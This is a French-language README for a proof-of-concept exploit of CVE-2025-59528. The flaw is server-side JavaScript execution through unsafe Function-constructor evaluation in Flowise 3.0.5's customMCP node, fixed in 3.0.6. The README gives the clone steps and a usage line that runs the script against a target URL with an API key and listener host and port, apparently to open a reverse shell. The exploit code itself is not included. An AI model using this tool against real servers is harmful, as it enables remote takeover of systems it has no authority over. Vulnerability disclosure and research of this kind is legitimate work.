
CVE-2025-59528 Proof of Concept
Ce dépôt contient une preuve de concept démontrant CVE-2025-59528 dans Flowise v3.0.5
La vulnérabilité existe dans le nœud customMCP, où l'entrée mcpServerConfig fournie par l'utilisateur est traitée d'une manière qui conduit à l'exécution de code JavaScript via une évaluation non sécurisée utilisant le constructeur Function.
| Affectée | Corrigée |
|---|---|
| 3.0.5 | 3.0.6 |
Un utilisateur authentifié pourrait être en mesure d'exécuter du JavaScript arbitraire sur le serveur, pouvant potentiellement conduire à une exécution de code à distance.
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
python3 CVE-2025-59528.py -t "<url>" --api-key <api_key> --lhost <ip> --lport <port>

Cet outil est fourni à des fins éducatives et de recherche uniquement. Le créateur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par l'outil.